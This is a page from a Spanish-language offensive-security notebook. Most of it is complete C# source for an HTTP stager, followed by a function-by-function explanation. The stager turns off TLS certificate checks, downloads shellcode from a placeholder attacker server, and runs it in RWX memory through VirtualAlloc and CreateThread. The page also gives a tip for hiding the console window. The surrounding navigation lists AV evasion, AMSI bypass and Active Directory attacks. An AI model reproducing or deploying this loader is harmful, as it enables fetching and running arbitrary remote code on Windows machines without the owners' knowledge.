CyberSec Notes
  • Bienvenida
    • CyberSec Notes
  • Network Services
    • Port 21 - FTP
    • Port 22 - SSH
    • Port 23 - Telnet
    • Port 25 - SMTP
    • Port 53 - DNS
      • Deploy DNS Server with BIND
    • Port 80/443 - HTTP/HTTPS
      • Wordpress
      • CMS Made Simple (CMSMS)
    • Port 88 - Kerberos
    • Port 386, 636, 3268, 3269 - LDAP
    • Port 445 - SMB
    • Port 1521,1522-1529 - Oracle TNS Listener
    • Port 3128 - Squid
    • Port 5985, 5986 - WinRM
  • Command && Control
    • Sliver C2 [in progress]
  • Ataques en Entornos Windows
    • MalDev
      • AV Evasion
        • Function call obfuscation
      • Code Samples
        • Shellcode Execution C#
        • Shellcode Execution C++
        • Stager HTTP C#
        • Stager HTTP C++
        • Process Inyection C++
        • Process Inyection C#
        • XOR Encrypt C++
    • Directorio Activo
      • Spriying
      • Autenticacion Net-NTLMv2 y tipos de hashes
        • Pass the Hash
        • SMB Relay
      • Autenticación Kerberos
        • Extensiones del protocolo Kerberos (SPNs & PACs)
        • AS_REP Roasting
        • Kerberoasting
        • Silver Ticket Attack
        • Golden Ticket Attack
      • DCSync
      • Mimikatz
      • BloodHound
      • Privilege Escalation
        • PS Credentials in XML format
      • Utils
    • Amsi Bypass
    • Buffer Overflow
      • Stack Based 32 bits [in progress]
        • Windows SLMail 5.5
  • Ataques en Entornos Linux
    • Privilege escalation [in progress]
    • MalDev
      • Simple Reverse Shell
    • Buffer Over Flow
      • Stack Based 32 bits
        • Linux, Vulnerable functions in C programs
    • Persistencia
  • General
    • Host Discovery
    • Reverse Shells Cheet Sheet
    • Pivoting
      • Chisel
      • Port Forwarding
      • Nmap con pivoting
    • Google Dorks [in progress]
    • Denial of Service (DoS)
      • Low and Slow
    • Docker
  • Pentesting Web
    • XML External Entity Injection(XXE)
      • Portswigger Lab #1: Retrieve Files
      • Portswigger Lab #2: Perform SSRF
      • Portswigger Lab #6: Blind XXE to retrieve data via error messages
    • Open Redirect
    • LFI
      • Log Poisoning (Apache, SSH y SMPT)
  • Wireless Pentesting
    • Pre Connection Attacks
      • WEP
      • WPA/WPA2
    • Post Connection Attacks
      • ARP Spoof
    • Fake AP for Captive Portal
Powered by GitBook
On this page
  • Código
  • Configuración inicial
  • Explicación
  • Función Main
  • Función Download
  1. Ataques en Entornos Windows
  2. MalDev
  3. Code Samples

Stager HTTP C#

Código

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Runtime.InteropServices;
using System.Net;

namespace stagerHttp
{
    class Program
    {
        public static void Main(String[] args)
        {
            byte[] shellcode = Download("http://<ip-shellcode-server>:<port>/<shellcode-filename>");
            Execute(shellcode);

            return;
        }

        private static byte[] Download(string url)
        {
            ServicePointManager.ServerCertificateValidationCallback += (sender, certificate, chain, sslPolicyErrors) => true;

            System.Net.WebClient client = new System.Net.WebClient();
            byte[] shellcode = client.DownloadData(url);

            return shellcode;
        }


        [DllImport("kernel32")]
        static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

        [DllImport("kernel32")]
        static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

        [DllImport("kernel32.dll")]
        static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

        private static void Execute(byte[] shellcode)
        {
            IntPtr addr = VirtualAlloc(IntPtr.Zero, (UInt32)shellcode.Length, 0x1000, 0x40);
            Marshal.Copy(shellcode, 0, (IntPtr)(addr), shellcode.Length);


            IntPtr hThread = IntPtr.Zero;
            IntPtr threadId = IntPtr.Zero;
            hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, threadId);

            WaitForSingleObject(hThread, 0xFFFFFFFF);

            return;
        }
    }
}

Configuración inicial

Para ocultar la consola hay que seleccionar este campo

Para compilar en 64 bytes:

Explicación

Función Main

En este bloque lo que hacemos es almacenar lo que la función Download() devuelve en una variable para luego ejecutarla.

public static void Main(String[] args)
        {
            byte[] shellcode = Download("http://<ip-shellcode-server>:<port>/<shellcode-filename>");
            Execute(shellcode);

            return;
        }

Función Download

La primer linea de esta función se encarga de que cuando queramos descargar el shellcode no se fije en los errores producidos por https, que si bien podría funcionar sin esto, puede servir en otra situación.

Después nos valemos del método DownloadData() para descargar como bytes el contenido de lo que le pasemos como url y posteriormente retornarlo.

private static byte[] Download(string url)
        {
            ServicePointManager.ServerCertificateValidationCallback += (sender, certificate, chain, sslPolicyErrors) => true;

            System.Net.WebClient client = new System.Net.WebClient();
            byte[] shellcode = client.DownloadData(url);

            return shellcode;
        }

PreviousShellcode Execution C++NextStager HTTP C++

Last updated 1 year ago

ServicePointManager.ServerCertificateValidationCallback Property (System.Net)MicrosoftLearn
Logo